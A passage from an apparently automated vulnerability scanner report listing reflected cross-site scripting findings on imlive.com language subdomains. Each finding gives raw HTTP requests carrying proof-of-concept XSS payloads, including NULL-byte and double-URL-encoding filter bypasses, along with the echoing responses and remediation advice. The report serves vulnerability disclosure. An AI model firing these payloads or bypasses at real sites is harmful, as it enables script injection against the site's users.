GET /?5433f"><script>alert(1)</script>d728cbd751f=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:06 GMT
Connection: close
Content-Length: 22643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="cafr" title="Fran..ais (Canada)" href="http://cafr.imlive.com/" onclick="dAccess('http://cafr.imlive.com/?5433f"><script>alert(1)</script>d728cbd751f=1');return false;" lang="fr-CA" hreflang="fr-CA">
...[SNIP]...

2.16. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d05ee"><script>alert(1)</script>a1533097529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d05ee"><script>alert(1)</script>a1533097529 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?%00d05ee"><script>alert(1)</script>a1533097529=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=cewkwz45egz5sj55nckzfefj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cewkwz45egz5sj55nckzfefj; path=/; HttpOnly
Set-Cookie: spvdr=vd=60d7fb6d-8833-413b-b606-2c070cf64a07&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:53 GMT
Connection: close
Content-Length: 20012
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%00d05ee"><script>alert(1)</script>a1533097529~1');return false;">
...[SNIP]...

2.17. http://cafr.imlive.com/waccess/ [cbname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd05a"><script>alert(1)</script>cbe3a729d46 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=fd05a"><script>alert(1)</script>cbe3a729d46&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:00 GMT
Connection: close
Content-Length: 23731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=fd05a"><script>alert(1)</script>cbe3a729d46&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.18. http://cafr.imlive.com/waccess/ [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8372"><script>alert(1)</script>d63676c4113 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=a8372"><script>alert(1)</script>d63676c4113&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:05 GMT
Connection: close
Content-Length: 23731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=a8372"><script>alert(1)</script>d63676c4113&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.19. http://cafr.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b90b7'onerror%3d'alert(1)'58d5403e5f1 was submitted in the gotopage parameter. This input was echoed as b90b7'onerror='alert(1)'58d5403e5f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=b90b7'onerror%3d'alert(1)'58d5403e5f1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQQDTD=FAMDOIMABGHKKJABIPAJKPBJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:03 GMT
Connection: close
Content-Length: 8309
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=cafr.imlive.com&ul=/waccess/b90b7'onerror='alert(1)'58d5403e5f1/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://cafr.imlive.com:80/waccess/b90b7'onerror='alert(1)'58d5403e5f1/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.20. http://cafr.imlive.com/waccess/ [promocode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980ab"><script>alert(1)</script>eacf27c2ca8 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:56 GMT
Connection: close
Content-Length: 23731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.21. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23d94"><script>alert(1)</script>9f278dc55b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?23d94"><script>alert(1)</script>9f278dc55b9=1 HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=jcjlwv45cdqvuq45jg2ymj55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jcjlwv45cdqvuq45jg2ymj55; path=/; HttpOnly
Set-Cookie: spvdr=vd=a5fba809-a8f8-4ede-a672-0e8009aef27d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:57 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:57 GMT
Connection: close
Content-Length: 19484
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||23d94"><script>alert(1)</script>9f278dc55b9~1');return false;">
...[SNIP]...

2.22. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 621b5'-alert(1)-'46747e803cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?621b5'-alert(1)-'46747e803cf=1 HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0j1k2i45sqmefs55bexfj02y; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0j1k2i45sqmefs55bexfj02y; path=/; HttpOnly
Set-Cookie: spvdr=vd=19204602-dd52-49f1-bfdd-42f8de7ee2b0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:59 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:59 GMT
Connection: close
Content-Length: 19083
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=de.imlive.com&ul=/?621b5'-alert(1)-'46747e803cf=1&qs=621b5'-alert(1)-'46747e803cf=1&qs=621b5'-alert(1)-'46747e803cf=1&iu=1&vd=19204602-dd52-49f1-bfdd-42f8de7ee2b0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefi
...[SNIP]...

2.23. http://de.imlive.com/waccess/ [cbname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e12af"><script>alert(1)</script>f4d60ab8f81 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=e12af"><script>alert(1)</script>f4d60ab8f81&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:20 GMT
Connection: close
Content-Length: 23399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=e12af"><script>alert(1)</script>f4d60ab8f81&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.24. http://de.imlive.com/waccess/ [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee4f7"><script>alert(1)</script>0f4356d3bc3 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=ee4f7"><script>alert(1)</script>0f4356d3bc3&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:27 GMT
Connection: close
Content-Length: 23399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=ee4f7"><script>alert(1)</script>0f4356d3bc3&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.25. http://de.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d was submitted in the gotopage parameter. This input was echoed as db58b'onerror='alert(1)'44c9eed88d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSTRTBSD=CEBIMIMAOCCIFKMLDLMBDPAK; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 8303
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=de.imlive.com&ul=/waccess/db58b'onerror='alert(1)'44c9eed88d/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://de.imlive.com:80/waccess/db58b'onerror='alert(1)'44c9eed88d/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.26. http://de.imlive.com/waccess/ [promocode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8f5f"><script>alert(1)</script>74d0037b57 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
